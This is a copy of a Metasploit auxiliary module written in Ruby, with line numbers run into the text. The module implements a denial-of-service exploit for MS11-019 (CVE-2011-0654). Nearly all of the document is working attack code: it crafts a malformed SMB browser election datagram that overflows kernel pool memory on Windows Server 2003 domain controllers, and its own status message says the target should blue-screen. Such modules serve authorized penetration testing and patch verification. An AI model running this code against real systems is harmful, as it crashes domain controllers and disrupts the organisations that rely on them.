Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
Views: 11788
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7#include Msf::Exploit::Remote::SMB::Client8include Auxiliary::Dos910def initialize(info = {})11super(update_info(info,12'Name' => 'Microsoft Windows Browser Pool DoS',13'Description' => %q{14This module exploits a denial of service flaw in the Microsoft15Windows SMB service on versions of Windows Server 2003 that have been16configured as a domain controller. By sending a specially crafted election17request, an attacker can cause a pool overflow.1819The vulnerability appears to be due to an error handling a length value20while calculating the amount of memory to copy to a buffer. When there are21zero bytes left in the buffer, the length value is improperly decremented22and an integer underflow occurs. The resulting value is used in several23calculations and is then passed as the length value to an inline memcpy24operation.2526Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and27causes considerable damage to kernel heap memory. While theoretically possible,28it does not appear to be trivial to turn this vulnerability into remote (or29even local) code execution.30},31'References' =>32[33[ 'CVE', '2011-0654' ],34[ 'BID', '46360' ],35[ 'OSVDB', '70881' ],36[ 'MSB', 'MS11-019' ],37[ 'EDB', '16166' ],38[ 'URL', 'https://seclists.org/fulldisclosure/2011/Feb/285' ]39],40'Author' => [ 'Cupidon-3005', 'jduck' ],41'License' => MSF_LICENSE42))4344register_options(45[46Opt::RPORT(138),47OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ])48])49end505152def run5354connect_udp55@client = Rex::Proto::SMB::Client.new(udp_sock)5657ip = Rex::Socket.source_address(datastore['RHOST'])58ip_src = Rex::Socket.resolv_nbo(ip, false)5960svc_src = "\x41\x41\x00" # pre-encoded?61name_src = Rex::Text.rand_text_alphanumeric(15) # 4+rand(10))6263svc_dst = "\x42\x4f\x00" # pre-encoded?64name_dst = datastore['DOMAIN']6566pipe = "\\MAILSLOT\\BROWSER"6768election =69"\x08" + # Election Request70"\x09" + # Election Version71"\xa8" + # election desire - Domain Master & WINS & NT72"\x0f" + # Browser Protocol Major Version73"\x01" + # Browser Protocol Minor Version74"\x20" + # Election OS (NT Server)75"\x1b\xe9\xa5\x00" + # Uptime76"\x00\x00\x00\x00" + # NULL... Padding?77#("A" * 4) + "\x00"78Rex::Text.rand_text_alphanumeric(410) + "\x00"7980nbdghdr =81"\x11" + # DIRECT_GROUP datagram82"\x02" + # first and only fragment83[rand(0xffff)].pack('n') + # Transaction Id (DGM_ID)84ip_src +85"\x00\x8a" + # Source Port (138)86"\x00\xa7" + # DGM_LENGTH, patched in after87"\x00\x00" # PACKET_OFFSET8889nbdgs = nbdghdr +90half_ascii(name_src, svc_src) +91half_ascii(name_dst, svc_dst)9293# A Trans request for the mailslot94nbdgs << trans_mailslot(pipe, '', election)9596# Patch up the length (less the nb header)97nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n')9899print_status("Sending specially crafted browser election request..")100#print_status("\n" + Rex::Text.to_hex_dump(nbdgs))101udp_sock.put(nbdgs)102103print_status("The target should encounter a blue screen error now.")104105disconnect_udp106107end108109110# Perform a browser election request using the specified subcommand, parameters, and data111def trans_mailslot(pipe, param = '', body = '')112113# Null-terminate the pipe parameter if needed114if (pipe[-1,1] != "\x00")115pipe << "\x00"116end117118pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct119@client.smb_defaults(pkt['Payload']['SMB'])120121setup_count = 3122setup_data = [1, 0, 2].pack('v*')123124data = pipe + param + body125126base_offset = pkt.to_s.length + (setup_count * 2) - 4127param_offset = base_offset + pipe.length128data_offset = param_offset + param.length129130pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION131pkt['Payload']['SMB'].v['Flags1'] = 0x0132pkt['Payload']['SMB'].v['Flags2'] = 0x0133pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count134135pkt['Payload'].v['ParamCountTotal'] = param.length136pkt['Payload'].v['DataCountTotal'] = data.length137pkt['Payload'].v['ParamCountMax'] = 0138pkt['Payload'].v['DataCountMax'] = 0139140pkt['Payload'].v['ParamCount'] = param.length141pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0142pkt['Payload'].v['DataCount'] = body.length143pkt['Payload'].v['DataOffset'] = data_offset144pkt['Payload'].v['SetupCount'] = setup_count145pkt['Payload'].v['SetupData'] = setup_data146147pkt['Payload'].v['Payload'] = data148149exploit = pkt.to_s150151# Strip off the netbios header (thx, but no thx!)152exploit[4, exploit.length - 4]153end154155156def half_ascii(name, svc)157ret = " "158name.unpack('C*').each { |byte|159ret << [0x41 + (byte >> 4)].pack('C')160ret << [0x41 + (byte & 0xf)].pack('C')161}162left = 15 - name.length163if left > 0164ret << "\x43\x41" * left165end166167# In our case, svc is already encoded..168ret << svc169ret170end171end172173174